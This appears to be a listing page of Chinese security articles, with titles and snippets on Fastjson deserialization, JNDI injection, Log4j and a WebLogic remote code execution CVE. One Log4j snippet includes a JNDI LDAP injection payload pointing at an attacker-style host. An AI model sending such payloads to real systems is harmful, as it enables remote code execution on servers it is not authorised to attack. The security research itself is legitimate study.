目录0x00 Fastjson指纹0x01 FastJson简介0x02 fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)0x03 Fastjson 1.2...
我们应该了解的JNDI数据源配置
JNDI数据源配置是一种常用的数据源配置方法,代码审计中可作为一种修复建议,渗透测试时则需要拨开迷雾。一、写在前面文章主要介绍了JNDI数据源配置和找回密码的方法,只叹范围太大只能写下冰山一角,如有错...
探索高版本 JDK 下 JNDI 漏洞的利用方法:第二章
0x00 背景 我在前段时间写过一篇《探索高版本 JDK 下 JNDI 漏洞的利用方法》,里面例举了几种可以用作 JNDI 漏洞在Tomcat7和非Tomcat时的利用方法。 其中提到NativeLi...
从jndi到log4j2
JNDI基础JNDI的有关类:InitialContext类:InitialContext()构建一个初始上下文。 InitialContext(boolean laz...
干货|最全fastjson漏洞复现与绕过
简介Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是...
Java安全log4j漏洞前置知识JNDI注入
关于JNDI:1.JNDI是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。2.JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DN...
不完美的条件竞争JNDI漏洞利用链发现过程
0x00 前言 自我发布 《探索高版本 JDK 下 JNDI 漏洞的利用方法》这篇文章后就开始找基于org.apache.catalina.users.MemoryUserDatabaseFactor...
Weblogic Server(CVE-2021-2109 )远程代码执行漏洞复现
01简介WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应...
【技术分享】如何高效地捡漏反序列化利用链?
前言之前在文章如何高效地挖掘Java反序列化利用链中提到了我是如何高效挖掘利用链的,这其中提到了工具tabby。目前,tabby开源也有一段时间了,这段时间里有不少小伙伴问我如何在实际环境中更好地使用...
Log4j......
#这是一篇随手水文=${jndi:ldap://{{2xxxx.maliciouskr.cc/poc} 开源项目 Log4j ,网传只有三个人用业余时间在搞,因...
8u191后的JNDI注入利用
8u191后的JNDI注入利用JNDI注入版本关系图,参考如下:一、8u121之前使用RMI + JNDI Reference利用前面文章已经讲过了JNDI + RMI方式,直接利用marshalse...
深入理解JAVA中的JNDI注入
文章来源|MS08067安全实验室本文作者:D_infinite(Java审计培训班讲师)什么是JNDI?简单来说,JNDI (Java Naming and Directory Interface)...
19